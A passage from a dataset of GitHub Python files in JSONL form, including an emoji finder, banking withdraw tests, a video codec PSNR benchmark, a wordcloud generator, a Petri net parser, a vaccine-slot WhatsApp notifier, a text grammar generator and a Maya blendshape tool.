ValueError):\n return NOT_FOUND\n\n\ndef _make_emoji_mapping():\n \"\"\"Helper to make a mapping of all possible emojis:\n - loop through range(START_EMOJI_RANGE, sys.maxunicode +1)\n - return dict with keys=emojis, values=names\"\"\"\n for codepoint in range(START_EMOJI_RANGE, sys.maxunicode + 1):\n emoji = chr(codepoint)\n name = what_means_emoji(emoji)\n if name != NOT_FOUND:\n yield emoji, name\n\n\ndef find_emoji(term):\n \"\"\"Return emojis and their texts that match (case insensitive)\n term, print matches to console\"\"\"\n term = term.lower()\n\n emoji_mapping = _make_emoji_mapping()\n\n for emoji, name in emoji_mapping:\n if term in name.lower():\n print(name, emoji)\n","repo_name":"jarnoli/pybites","sub_path":"126/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5717838693","text":"from eventsourcing.application import AggregateNotFound\n\nfrom base import SqliteTestCase\nfrom common.domain.entities import User\nfrom common.domain.manager import Manager\nfrom common.models.errors import BadRequest\n\n\nclass TestWithdraw(SqliteTestCase):\n\n def setUp(self) -> None:\n super().setUp()\n\n self.user_id = 'user-1'\n self.amount = 100\n self.manager = Manager()\n\n def test_withdraw_for_non_existing_user_fail(self):\n self.assertRaises(AggregateNotFound, self.manager.user_withdraw, self.user_id, self.amount)\n\n def test_withdraw_for_existing_user_success(self):\n self.manager.user_deposit(self.user_id, self.amount)\n self.manager.user_withdraw(self.user_id, self.amount)\n\n user = self.manager.repository.get(User.create_id(self.user_id))\n\n self.assertEqual(user.balance, 0)\n\n def test_withdraw_insufficient_funds_fail(self):\n self.manager.user_deposit(self.user_id, self.amount)\n self.manager.user_withdraw(self.user_id, self.amount)\n\n self.assertRaises(BadRequest, self.manager.user_withdraw, self.user_id, self.amount)\n","repo_name":"ahmdatef/mini-exchange","sub_path":"tests/test_withdraw.py","file_name":"test_withdraw.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27060333597","text":"import argparse\nimport os\nimport subprocess\n\nimport math\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfrom Decoder import Decoder as Decoder\nfrom Encoder import Encoder as Encoder\n\nVIDEO_WIDTH = 416\nVIDEO_HEIGHT = 240\nVIDEO_SUFFIX = '.y'\nDATA_ROOT_PATH = 'dat'\nDATA_SUFFIX = '.dat'\nVIDEOS_PATH = 'videos/original'\nMPEG_OUTPUT = f'videos/test/MPEG2'\nHEVC_OUTPUT = f'videos/test/HEVC'\nOUR_OUTPUT = f'videos/test/our'\n\n# Adjust on your machine\nVIDEO_PSNR_TOOL_PATH = 'tools/psnr-raw-video/bin/GNU-9.3.0/psnrRaw'\n\nNO_FRAMES = {\n 'BasketballPass_416x240_50Hz_P400': {'n_frames': 501, 'fr': 50},\n 'BQSquare_416x240_60Hz_P400': {'n_frames': 601, 'fr': 60},\n 'Johnny_416x240_60Hz_P400': {'n_frames': 600, 'fr': 60},\n 'RaceHorses_416x240_30Hz_P400': {'n_frames': 300, 'fr': 30},\n}\n\ndef generate_data():\n df_our = pd.DataFrame(columns=['bpp', 'db'])\n df_mpeg2 = pd.DataFrame(columns=['bpp', 'db'])\n df_hevc = pd.DataFrame(columns=['bpp', 'db'])\n\n if not os.path.exists(MPEG_OUTPUT):\n os.makedirs(MPEG_OUTPUT)\n\n if not os.path.exists(HEVC_OUTPUT):\n os.makedirs(HEVC_OUTPUT)\n\n if not os.path.exists(OUR_OUTPUT):\n os.makedirs(OUR_OUTPUT)\n\n for video in os.listdir(VIDEOS_PATH):\n filename = video.split('.')[0]\n n_frames = NO_FRAMES.get(filename)['n_frames']\n f_rate = NO_FRAMES.get(filename)['fr']\n \"\"\"\n Our codec\n \"\"\"\n for index, qp in enumerate([8, 12, 16, 20, 24]):\n export_filename = f'{OUR_OUTPUT}/{filename}_QP_{qp}'\n # Encode\n enc = Encoder(f'{VIDEOS_PATH}/{filename}.y', f'{export_filename}.txt', 16, qp, True)\n enc.encode_video(VIDEO_WIDTH, VIDEO_HEIGHT, n_frames, 16)\n # Decode\n dec = Decoder(f'{export_filename}.txt', f'{export_filename}.y', pgm=False)\n dec.decode_all_frames()\n\n # Run PSNR tool\n process = subprocess.run(\n [VIDEO_PSNR_TOOL_PATH, str(VIDEO_WIDTH), str(VIDEO_HEIGHT), \"400\", f'{VIDEOS_PATH}/{filename}.y',\n f'{export_filename}.y', f'{export_filename}.txt', str(f_rate)], stdout=subprocess.PIPE)\n\n stdout = process.stdout.decode(\"utf-8\")\n out = (stdout.split('\\n\\n')[2]).split()\n bpp, db = float(out[0]), float(out[1])\n db = 0.0 if math.isinf(db) else db\n df_our.loc[index] = [bpp, db]\n\n # Store PSNR data\n version_path = os.path.join(DATA_ROOT_PATH, 'our')\n if not os.path.exists(version_path):\n os.mkdir(version_path)\n df_our.to_pickle(os.path.join(version_path, filename + DATA_SUFFIX))\n\n \"\"\"\n MPEG-2\n \"\"\"\n for index, qp in enumerate(range(2, 20)):\n export_filename = f'{MPEG_OUTPUT}/{filename}_QP_{qp}'\n # encode\n os.system(f'ffmpeg -f rawvideo -pix_fmt gray -s:v 416x240 -r 50.0 -i {VIDEOS_PATH}/{filename}.y \\\n -c:v mpeg2video -qscale:v {qp} -g 600 -bf 0 -vframes {n_frames} {export_filename}.mpg')\n # decode\n os.system(\n f'ffmpeg -i {export_filename}.mpg -c:v rawvideo -pix_fmt gray {export_filename}.yuv')\n\n # # Run PSNR tool\n process = subprocess.run(\n [VIDEO_PSNR_TOOL_PATH, str(VIDEO_WIDTH), str(VIDEO_HEIGHT), \"400\", f'{VIDEOS_PATH}/{filename}.y',\n f'{export_filename}.yuv', f'{export_filename}.mpg', str(f_rate)], stdout=subprocess.PIPE)\n\n stdout = process.stdout.decode(\"utf-8\")\n out = (stdout.split('\\n\\n')[2]).split()\n bpp, db = float(out[0]), float(out[1])\n db = 0.0 if math.isinf(db) else db\n df_mpeg2.loc[index] = [bpp, db]\n\n # Store PSNR data\n # TODO: Investigate why DataFrame is empty after reading from filesystem\n version_path = os.path.join(DATA_ROOT_PATH, 'mpeg2')\n if not os.path.exists(version_path):\n os.mkdir(version_path)\n df_mpeg2.to_pickle(os.path.join(version_path, filename + DATA_SUFFIX))\n\n \"\"\"\n \" HEVC\n \"\"\"\n for index, qp in enumerate(range(8, 32)):\n export_filename = f'{HEVC_OUTPUT}/{filename}_QP_{qp}'\n # encode\n os.system(\n f'ffmpeg -f rawvideo -pix_fmt gray -s:v 416x240 -r 50.0 -i {VIDEOS_PATH}/{filename}.y -c:v libx264 -crf {qp} -g 600 -bf 0 -vframes {n_frames} {export_filename}.mp4')\n # decode\n os.system(f'ffmpeg -i {export_filename}.mp4 -c:v rawvideo -pix_fmt gray {export_filename}.yuv')\n\n process = subprocess.run(\n [VIDEO_PSNR_TOOL_PATH, str(VIDEO_WIDTH), str(VIDEO_HEIGHT), \"400\", f'{VIDEOS_PATH}/{filename}.y',\n f'{export_filename}.yuv', f'{export_filename}.mp4', str(f_rate)], stdout=subprocess.PIPE)\n\n stdout = process.stdout.decode(\"utf-8\")\n out = (stdout.split('\\n\\n')[2]).split()\n bpp, db = float(out[0]), float(out[1])\n db = 0.0 if math.isinf(db) else db\n df_hevc.loc[index] = [bpp, db]\n\n # Store PSNR data\n version_path = os.path.join(DATA_ROOT_PATH, 'HEVC')\n if not os.path.exists(version_path):\n os.mkdir(version_path)\n df_hevc.to_pickle(os.path.join(version_path, filename + DATA_SUFFIX))\n\ndef plot_data(filename, version, versions):\n versions = versions.split(',') + [version] if versions else [version]\n\n plt.figure(figsize=(20, 12))\n for version in versions:\n ver = pd.DataFrame(pd.read_pickle(os.path.join(\n DATA_ROOT_PATH, version, filename + DATA_SUFFIX)))\n plt.plot(ver['bpp'], ver['db'], label=version)\n\n plt.xlabel('X: Bits (bpp)')\n plt.ylabel('Y: PSNR (db)')\n plt.legend()\n plt.title(filename)\n plt.savefig(\"PSNR_\" + filename + \".pdf\")\n plt.show()\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Tests encoder quality of a video')\n parser.add_argument('-nogenerate', dest='nogenerate', action='store_true',\n help='optional: if set, no new data is computed but version curves are plotted')\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = parse_args()\n if not args.nogenerate:\n generate_data()\n\n for video in os.listdir(VIDEOS_PATH):\n filename = video.split('.')[0]\n plot_data(filename,\"our\",\"HEVC,mpeg2\")\n","repo_name":"FUHannes/IVC","sub_path":"comparison_MPEG2_HEVC.py","file_name":"comparison_MPEG2_HEVC.py","file_ext":"py","file_size_in_byte":6423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17134793183","text":"\nimport random\n\nimport numpy as np\n\nimport pandas as pd\n\nfrom pyecharts import WordCloud\n\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image,ImageSequence\n\nfrom wordcloud import WordCloud,ImageColorGenerator\n\ndef DrawWordcloud(read_name):\n\n image = Image.open('src.jpg')#作为背景形状的图\n\n graph = np.array(image)\n\n #参数分别是指定字体、背景颜色、最大的词的大小、使用给定图作为背景形状\n\n wc = WordCloud(font_path = 'C:\\\\windows\\\\Fonts\\\\simhei.ttf', background_color = 'White', max_words = 50, mask = graph)\n\n fp = pd.read_csv(read_name)#读取词频文件\n\n name = list(fp.name)#词\n\n value = fp.val#词的频率\n\n for i in range(len(name)):\n\n name[i] = str(name[i])\n\n #注意因为要显示中文,所以需要转码\n\n name[i] = name[i].decode('gb2312')\n\n dic = dict(zip(name, value))#词频以字典形式存储\n\n wc.generate_from_frequencies(dic)#根据给定词频生成词云\n\n image_color = ImageColorGenerator(graph)\n\n plt.imshow(wc)\n\n plt.axis(\"off\")#不显示坐标轴\n\n plt.show()\n\n wc.to_file('Wordcloud.png')#保存的图片命名为Wordcloud.png\n\nif __name__=='__main__':\n\n DrawWordcloud(\"price.csv\")\n","repo_name":"houzhenguo/python","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30439280320","text":"string = \"\"\r\nfile = input(\"nom du fichier?\")\r\nf = open (file+\".txt\", \"r\")\r\nlines = f.readlines()\r\nici = False\r\nfor x in lines:\r\n\tif \"invariant\"in x:\r\n\t\tici = True\r\n\telse:\r\n\t\tif \"T-SEMI-FLOWS\" in x:\r\n\t\t\tici = False\r\n\tif ici == True:\r\n\t\tstring +=x\r\ntabplace = []\r\nfor x in range(0,len(string)):\r\n\tstartsemi = 0\r\n\tpoid = 0\r\n\tnbinvar = 0;\r\n\tchar = string[x]\r\n\tsemistart = 0\r\n\tif char == \"(\":\r\n\t\tpoid = int(string[x+1])\r\n\t\tnbinvar += 1\r\n\t\tbufsemi = \"\"\r\n\t\ttabcouple = []\r\n\t\tnbplace = 0;\r\n\t\tfor a in range(0,x):\r\n\t\t\tbufsemi = bufsemi + string[a+semistart]\r\n\t\t\tif string[a+semistart] == \"{\":\r\n\t\t\t\tbufplace = \"\"\r\n\t\t\t\tplacestart = a+semistart+1\r\n\t\t\t\twhile string[placestart] != \"}\":\r\n\t\t\t\t\tbufplace = bufplace + string[placestart]\r\n\t\t\t\t\tplacestart +=1\r\n\t\t\t\tif string[placestart+1] == '*':\r\n\t\t\t\t\tpoid = int(poid/int(string[placestart+2]))\r\n\t\t\t\ttabplace.append((bufplace,poid))\r\n\t\t\t\tnbplace += 1\r\n\t\tsemistart = x+3\r\ncount = 0\r\nfinaltab = []\r\nfor place in tabplace:\r\n\tnbdouble = 0\r\n\tif place in tabplace:\r\n\t\tbuftab = tabplace[:]\r\n\t\tsmallerpoid = place[1]\r\n\t\tfor c in range(tabplace.index(place), len(tabplace)):\r\n\t\t\tp = place[0]\r\n\t\t\tbufp = tabplace[c][0]\r\n\t\t\tif p == bufp:\r\n\t\t\t\tif smallerpoid > tabplace[c][1]:\r\n\t\t\t\t\tsmallerpoid = tabplace[c][1]\r\n\t\t\t\tbuftab.remove(tabplace[c])\r\n\t\tfinaltab.append((place[0],smallerpoid))\r\n\ttabplace = buftab[:]\r\n\tcount +=1\r\n\r\nfor x in range(0,len(finaltab)):\r\n\tprint(finaltab[x])\r\n","repo_name":"Trithuan/r-seau-petri","sub_path":"borne_invariant.py","file_name":"borne_invariant.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8843809620","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 8 08:33:42 2021\n\n@author: abc\n\"\"\"\n\n\nimport requests\nimport json\nfrom datetime import date\nfrom twilio.rest import Client\nimport requests\nfrom datetime import timedelta\n\n\ndef send_notification(response, contact_directory, district,day):\n response_dict = json.loads(response.content)\n sessions = response_dict['sessions']\n print(response_dict)\n message = \"{} Vaccine Availability for district {} : \".format(day, district)\n count = 1\n for session in sessions:\n message = '{} \\n {}- name : {} , pincode : {} , for age above : {} , availability : {} , avaiable vaccine : {}'.format(message,count ,session['name'],session['pincode'] ,session['min_age_limit'],session['available_capacity'] ,session['vaccine'] )\n count = count+1 \n\n if len(sessions)>0:\n twilio_sid = 'SID'\n auth_token = 'Token'\n whatsapp_client = Client(twilio_sid, auth_token)\n \n for key, value in contact_directory.items():\n msg_loved_ones = whatsapp_client.messages.create(\n body = message,\n from_= 'whatsapp:+14155238886',\n to='whatsapp:' + value,\n\n )\n \ndef call(request): \n \n headers={'User-Agent': 'PostmanRuntime/7.26.8',\n 'Accept': 'application/json',\n 'Accept-Language': 'hi_IN',\n 'Host': 'cdn-api.co-vin.in'}\n today = date.today().strftime(\"%d-%m-%Y\")\n tomorrow = (date.today() + timedelta(days=1)).strftime(\"%d-%m-%Y\")\n\n \n response_gondia = requests.get(\"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id=378&date={}\".format(today),headers=headers,verify=False)\n response_gondia_tomorrow = requests.get(\"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id=378&date={}\".format(tomorrow),headers=headers,verify=False)\n contact_directory_gondia = {'Jenu':'+91123456789'}\n \n send_notification(response_gondia,contact_directory_gondia, 'Gondia',\"Today's\")\n send_notification(response_gondia_tomorrow,contact_directory_gondia, 'Gondia',\"Tomorrow's\")\n \n","repo_name":"jainita95/Cowin-Vaccine-Tracker-GCP-cloud-Function","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28143518714","text":"# 9012_괄호\n\ncmd = int(input())\nopen_cnt = 0\nclose_cnt = 0\n\nfor i in range(0,cmd):\n arr = list(input())\n for j in range(0,len(arr)):\n if arr[j] == \"(\":\n open_cnt += 1\n if arr[j] == \")\":\n close_cnt += 1\n\n if close_cnt > open_cnt:\n break\n if close_cnt == open_cnt:\n print(\"YES\")\n else:\n print(\"NO\")\n open_cnt = 0\n close_cnt = 0","repo_name":"youjeonghan/BackJoon_Algorithm","sub_path":"자료구조/9012_괄호.py","file_name":"9012_괄호.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25942420774","text":"#!/usr/bin/env python3.5\n\n# Problem: Perimeter of squares in a rectangle\n\"\"\"\nThe drawing whows 6 squares the sides of which have a length of 1,1,2,3,5,8. It's\neasy to see that the sum of the perimeters of these squares is:\n4 * (1 + 1 + 2 + 3 + 5 + 8) = 4 * 20 = 80\n\nCould you give the sum of the perimeters of all the squares in a rectangle when there are n + 1 squares disposed in the same manner as in the drawing:\n\n\n# Hint: See Fibonacci sequence\n\n# Ref: http:///oeis.org/AOOO45\n\nThe function perimeter has for parameter n where n+1 the number of squares(they are\nnumbered from 0 to n) and returns the totat perimeter of all the squares.\n\n\n\"\"\"\n\n\ndef perimeter(n):\n l = [1,1]\n for i in range(2,n+1):\n l.append(l[i-2] + l[i-1])\n return sum(l) * 4\n\n\n# Other Solutions:\n\n# Solution 1: By EarlGrey\n\ndef fib(n):\n a, b = 0, 1\n\n for i in range(n+1):\n if i == 0:\n yield b\n else:\n a, b = b, a+b\n yield b\ndef perimeter(n):\n return sum(fib(n)) * 4\n\n# Solution 2: By Lechevalier\n\ndef perimeter(n):\n a, b = 1, 2\n while n:\n a, b, n = b, a + b, n - 1\n return 4 * (b - 1)\n\nprint(fib(3))\nprint(perimeter(1))\n","repo_name":"patricksile/code_folder","sub_path":"code_wars/5kyu_perimeter_squares_rectangle.py","file_name":"5kyu_perimeter_squares_rectangle.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70928815553","text":"# coding=utf-8\n\n\"\"\"Probabilistic Context Free Grammar.\"\"\"\n\nfrom collections import defaultdict\nimport random\nimport re\nimport sys\nimport os\n\n\nVERBS = {\"research\": \"researching\", \"mine\": \"mining\", \"craft\": \"crafting\"}\n\n\nclass MaximumDepthExceeded(Exception):\n \"\"\"Exception that is raised if the parse tree runs too deep.\"\"\"\n\n pass\n\n\nclass SymbolNotFound(Exception):\n \"\"\"Fix yo grammar.\"\"\"\n\n pass\n\n\nclass Grammar(object):\n\n grammars = {}\n\n def __init__(self, grammar_string):\n self.grammar = self.parse_grammar(grammar_string)\n\n @classmethod\n def load(cls, grammar_file):\n with open(\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"data\",\n grammar_file + \".grammar\",\n )\n ) as f:\n cls.grammars[grammar_file] = cls(f.read())\n return cls.grammars[grammar_file]\n\n def weighted_choice(self, options, weights):\n \"\"\"Choose a random item, according to weights.\n\n Args:\n options: list\n weights: list of floats -- don't have to add up to 1\n Returns:\n element of options\n \"\"\"\n target = random.random() * sum(weights)\n acc = 0\n for idx, weight in enumerate(weights):\n acc += weight\n if acc > target:\n return options[idx]\n\n def parse_grammar(self, grammar):\n \"\"\"Return a dictionary mapping symbols to extensions.\n\n Example:\n >>> grammar = '''\n @s -> @n @v\n @s -> @n @v @n\n @n -> dog | cat\n @v -> chases %3 | eats %2.0'''\n >>> parse_grammar(grammar)\n {\n \"@s\": [\n [ \"@n @v\", 0.3 ],\n [ \"@n @v @n\", 0.7 ]\n ],\n \"@v\": [\n [ \"chases\", 0.75 ],\n [ \"eats\", 0.25 ]\n ],\n \"@n\": [\n [ \"dog\", 0.5 ],\n [ \"cat\", 0.5 ]\n ]\n }\n\n Args:\n grammar: str\n Returns:\n dict\n \"\"\"\n weight_re = r\"%((?:[\\d]*\\.)?[\\d]+)\"\n\n result = defaultdict(list)\n for line in grammar.splitlines():\n if \"->\" in line:\n symbol, extension = line.split(\"->\")\n for extension in extension.split(\"|\"):\n weight = re.search(weight_re, extension)\n if weight:\n extension = re.sub(weight_re, \"\", extension)\n weight = float(weight.group(1))\n else:\n weight = 1.0\n result[symbol.strip()].append((extension.strip(), weight))\n\n # normalize\n for symbol, extensions in result.items():\n total_weight = sum(ext[1] for ext in extensions)\n result[symbol] = [(ext[0], ext[1] / total_weight) for ext in extensions]\n\n return dict(result)\n\n def transform(self, parts, rule):\n if rule == \"gen\":\n if parts[-1].rstrip().endswith(\"s\"):\n parts[-1] = parts[-1].rstrip() + \"'\"\n else:\n parts[-1] = parts[-1].rstrip() + \"'s\"\n if rule == \"initial\":\n return [p[0].upper() for p in parts]\n if rule == \"title\":\n return [p if p in (\"by\", \"of\", \"and\") else p.capitalize() for p in parts]\n return parts\n\n def extend_rule(self, symbol=\"@s\", max_depth=8):\n \"\"\"Start with a symbol and returns a list of tokens.\n\n Args:\n symbol: str -- should start with @\n max_depth: int -- maximum tree depth.\n Returns:\n list -- list of parts\n Raises:\n MaximumDepthExceeded\n SymbolNotFound\n \"\"\"\n rule = None\n if \"~\" in symbol:\n symbol, rule = symbol.split(\"~\")\n if max_depth == 0:\n raise MaximumDepthExceeded\n if symbol not in self.grammar:\n raise SymbolNotFound(symbol)\n extension = self.weighted_choice(*zip(*self.grammar[symbol]))\n result = self.extend_sentence(extension, max_depth)\n return self.transform(result, rule)\n\n def extend_sentence(self, sentence, max_depth=8):\n result = []\n for part in sentence.replace(\"\\n\", \"\\n \").split(\" \"):\n if part.startswith(\"@\"):\n result.extend(self.extend_rule(part, max_depth - 1))\n else:\n result.append(part)\n return result\n\n # def extend_all(sentence, grammar, max_depth=8):\n # if max_depth == 0:\n # yield \" \".join(sentence)\n # else:\n # if not isinstance(sentence, list):\n # sentence = sentence.split()\n # first_chars = [c[0] for c in sentence]\n # try:\n # part = first_chars.index(\"@\")\n # for extension, pr in grammar[sentence[part]]:\n # for r in extend_all(sentence[:part] + [extension] + sentence[part + 1:], grammar, max_depth - 1):\n # yield r\n # except ValueError:\n # yield \" \".join(sentence)\n\n def assemble_sentence(self, parts):\n \"\"\"Clean up parts and applies some syntactic rules.\n\n Args:\n parts: list\n Returns:\n str\n \"\"\"\n sentence = \" \".join(parts)\n sentence = re.sub(r\" ([,.!?])\", r\"\\1\", sentence)\n sentence = re.sub(r\"' ([A-Za-z0-9 ]+) '\", r\"'\\1'\", sentence)\n sentence = re.sub(r\" +\", r\" \", sentence)\n sentence = re.sub(r\"\\n \", \"\\n\", sentence)\n return sentence.strip()\n\n def generate(self, sentence=None):\n \"\"\"Generate a sentence from a grammar string.\n\n Args:\n grammar: str\n Returns:\n str\n \"\"\"\n parts = None\n while not parts:\n try:\n parts = self.extend_sentence(sentence)\n except MaximumDepthExceeded:\n pass\n except SymbolNotFound as e:\n print(f\"WARNING: Symbol {e.args[0]} not found\", file=sys.stderr)\n return self.assemble_sentence(parts)\n\n\nNAMES = Grammar.load(\"names\")\nGUILDS = Grammar.load(\"guild_names\")\nLETTER = Grammar.load(\"letter\")\n","repo_name":"maebert/shellcraft","sub_path":"src/shellcraft/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"16454828497","text":"import pymel.core as pm\nimport maya.mel as mel\n\nimport model.blendnode\n\n# set up blend shape\ndef paint_weight_pose(base_mesh, pose_mesh, open_weights_tool=True):\n\t'''\n\tCreate a blendshape that allows the user to paint one pose onto another.\n\t:param PyNode base_mesh: The mesh that is the source. It is used to paint onto the other mesh.\n\t:param PyNode pose_mesh: The mesh that is the target. The base mesh gets painted onto this mesh.\n\t:param bool open_weights_tool: Opens the maya blendshape weight tool\n\t:return:\n\t'''\n\t# create network\n\tnetwork_node = paint_weight_network.create()\n\n\tblendnode = model.blendnode.BlendShapeNode.create(base_mesh, pose_mesh)\n\tblendnode.attr(base_mesh).set(1)\n\n\tblendnode.addAttr('network_pbs', at='message')\n\tbase_mesh.addAttr('network_pbs', at='message')\n\tpose_mesh.addAttr('network_pbs', at='message')\n\n\tnetwork_node.connect_meshes(base_mesh, pose_mesh)\n\tnetwork_node.connect_blendnode(blendnode)\n\n\tblendnode.set_weights(pose_mesh)\n\tpm.select(pose_mesh)\n\tif open_weights_tool:\n\t\tmel.eval('ArtPaintBlendShapeWeightsToolOptions')\n\n\treturn\n\n\ndef paint_weight_pose_finish(pose_name):\n\t# quit maya paint tool\n\tmeta_node = get_paint_weight_network()\n\tif meta_node:\n\t\tnew_pose = meta_node.new_pose(pose_name=pose_name)\n\t\tif new_pose.hasAttr('network_pbs'):\n\t\t\tnew_pose.deleteAttr('network_pbs')\n\t\tmeta_node.remove_attrs()\n\t\tmeta_node.delete_blendnode()\n\t\tmeta_node.delete()\n\t\treturn new_pose\n\tnew_pose=None\n\tif meta_node:\n\t\tnew_pose = meta_node.new_pose(pose_name=pose_name)\n\t\tmeta_node.remove_attrs()\n\t\tmeta_node.delete_blendnode()\n\t\tmeta_node.delete()\n\treturn new_pose\n\n\ndef cancel_paint_weight_pose():\n\tmeta_node = get_paint_weight_network()\n\tif meta_node:\n\t\tmeta_node.remove_attrs()\n\t\tmeta_node.delete_blendnode()\n\t\tmeta_node.delete()\n\ndef reset_scene():\n\tmeshes = pm.ls(type=pm.nt.Transform)\n\tmeta_node = get_paint_weight_network()\n\tmesh_count = 0\n\tmeta_found = False\n\tfor x in meshes:\n\t\tif x.hasAttr('network_pbs'):\n\t\t\tmesh_count+=1\n\t\t\tx.deleteAttr('network_pbs')\n\tif meta_node:\n\t\tmeta_node.delete()\n\t\tmeta_found = True\n\n\tmeta_str = 'No Meta Node found.'\n\tif meta_found:\n\t\tmeta_str = 'Meta Node was found and deleted.'\n\n\tmessage = '{0} meshes were cleaned. {1}'.format(mesh_count, meta_str)\n\n\tpm.confirmDialog(t='Reset Scene', message=message)\n\n\n############################################################################\n\ndef get_paint_weight_network():\n\tnetworks = pm.ls(type=pm.nt.Network)\n\tfor node in networks:\n\t\tif node.hasAttr('is_paint_weight_network') and node.is_paint_weight_network.get():\n\t\t\treturn paint_weight_network(node)\n\nclass paint_weight_network:\n\tVERSION = 1.0\n\n\tdef __init__(self, network_node):\n\t\tif not isinstance(network_node, pm.nt.Network):\n\t\t\tnetwork_node = pm.PyNode(network_node)\n\t\tself.network_node = network_node\n\n\t@classmethod\n\tdef create(cls, name='paint_weight_network_node'):\n\t\tnetwork_node = pm.createNode('network', name=name)\n\t\tnetwork_node.addAttr('meta_type', dt='string')\n\t\tnetwork_node.addAttr('version', at='double')\n\t\tnetwork_node.addAttr('is_paint_weight_network', at='bool')\n\t\tnetwork_node.addAttr('base_mesh', at='message')\n\t\tnetwork_node.addAttr('pose_mesh', at='message')\n\t\tnetwork_node.addAttr('paint_blendnode', at='message')\n\n\t\tnetwork_node.meta_type.set(paint_weight_network.__name__)\n\t\tnetwork_node.version.set(paint_weight_network.VERSION)\n\t\tnetwork_node.is_paint_weight_network.set(True)\n\t\tpm.lockNode(network_node, lock=True)\n\t\treturn cls(network_node)\n\n\tdef connect_meshes(self, base_mesh, pose_mesh):\n\t\tif not base_mesh.hasAttr('network_pbs'):\n\t\t\tbase_mesh.addAttr('network_pbs', at='message')\n\t\tif not pose_mesh.hasAttr('network_pbs'):\n\t\t\tpose_mesh.addAttr('network_pbs', at='message')\n\t\tself.network_node.base_mesh >> base_mesh.network_pbs\n\t\tself.network_node.pose_mesh >> pose_mesh.network_pbs\n\n\tdef connect_blendnode(self, blendnode):\n\t\tif not blendnode.hasAttr('network_pbs'):\n\t\t\tblendnode.addAttr('network_pbs', at='message')\n\t\tself.paint_blendnode >> blendnode.network_pbs\n\n\tdef get_base_mesh(self):\n\t\treturn self.network_node.base_mesh.get()\n\n\tdef get_pose_mesh(self):\n\t\treturn self.network_node.pose_mesh.get()\n\n\tdef get_blendnode(self):\n\t\treturn self.network_node.paint_blendnode.get()\n\n\tdef remove_attrs(self):\n\t\tbase_mesh = self.get_base_mesh()\n\t\tpose_mesh = self.get_pose_mesh()\n\t\tbase_mesh.deleteAttr('network_pbs')\n\t\tpose_mesh.deleteAttr('network_pbs')\n\n\tdef delete_blendnode(self):\n\t\tblendnode = self.get_blendnode()\n\t\tpm.delete(blendnode)\n\n\tdef new_pose(self, pose_name):\n\t\tpose_mesh = self.pose_mesh.get()\n\t\tnew_pose = pm.duplicate(pose_mesh, n=pose_name)[0]\n\t\treturn new_pose\n\n\tdef delete(self):\n\t\tpm.lockNode(self.network_node, lock=False)\n\t\tpm.delete(self.network_node)\n\n\tdef __str__(self):\n\t\treturn self.network_node.__str__()\n\n\tdef __getattr__(self, attrname):\n\t\tif attrname == 'pynode':\n\t\t\traise AttributeError(\"this instance of {0} has no pynode\".format(self.__class__.__name__))\n\t\treturn getattr(self.network_node, attrname)\n\n\tdef __melobject__(self):\n\t\treturn self.network_node.__melobject__()\n\n\tdef __repr__(self):\n\t\treturn self.network_node.__repr__()\n\n\n\n\n\n","repo_name":"deathglitch/metarigging","sub_path":"python/model/ui_tools/paint_pose.py","file_name":"paint_pose.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33661262788","text":"#############################################################################\r\n#\r\n# The [Algoríthm: algconbunveloc.py] will calculus the value of the velocity\r\n# nas Unidades: [Mph] ou [Kph] ou [Mps] ou [foot/s].\r\n# Developed by Isabelle G. Girodo -- Version: 1.2(Stable)\r\n# Date: 20221001\r\n#\r\n#############################################################################\r\n\r\nfrom ConvUnidVelocidade import *\r\n\r\nprint(\"\\n\\t\\t\\t====================================\")\r\nprint(\"\\t\\t\\t* [ALGORÍTHM: ALGCONBUNVELOCID.PY] *\")\r\nprint(\"\\t\\t\\t====================================\")\r\n\r\nprint('\\n\\n\\tºº[ DEFINITION OF THE VARIABLES GETED IN RESULT ]ºº\\n')\r\nprint('\\t--[Mph]: Mile per hour')\r\nprint('\\t--[Kph]: Kilometer per hour')\r\nprint('\\t--[Mps]: Meter per second')\r\nprint('\\t--[Fts]: Foot per second')\r\n\r\nprint(\"\\n\\n\\t<<[ INSTRUCTIONS FOR USE ]>>\\n\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Mile per hour] key [1]\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Kilometer per hour] key [2]\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Meter per second]key [3]\")\r\nprint(\"\\t- If the [Velocity] will calculed in [Foot per second]key [4]\")\r\n\r\ndef InstMens1():\r\n print(\"\\t+ If the [Velocity Unit] is given in [Mph] key: [i] or [I].\")\r\n return\r\n\r\ndef InstMens2():\r\n print(\"\\t+ If the 